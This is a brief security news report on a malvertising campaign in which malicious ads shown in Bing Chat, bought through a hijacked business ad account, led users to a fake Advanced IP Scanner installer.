Malwarebytes has discovered that malicious ads are being used to distribute malware through Microsoft Bing’s artificial intelligence (AI) chatbot, Bing Chat.
Introduced by Microsoft in February 2023, Bing Chat is powered by OpenAI’s GPT-4 language model and offers an interactive search experience. However, threat actors have exploited this feature to serve malware to unsuspecting users.
Ads can be inserted into Bing Chat conversations when users hover over links, displaying ads before showing organic results. These ads can lead users to fraudulent links, ultimately resulting in the installation of malware.
In a specific example, a Bing Chat query for legitimate software like Advanced IP Scanner returned a link with a malicious ad when hovered over. Clicking on the link took users to a traffic direction system (TDS) that verified the user’s request before redirecting them to a decoy page containing the rogue installer.
This installer runs a Visual Basic Script that communicates with an external server, likely for the delivery of the next-stage payload. The exact nature of the malware being distributed remains unknown.
Notably, the threat actor behind this campaign infiltrated the ad account of a legitimate Australian business to create the malicious ads. This tactic highlights the ongoing risk posed by malvertising, as users can be easily tricked into downloading malware from convincing landing pages.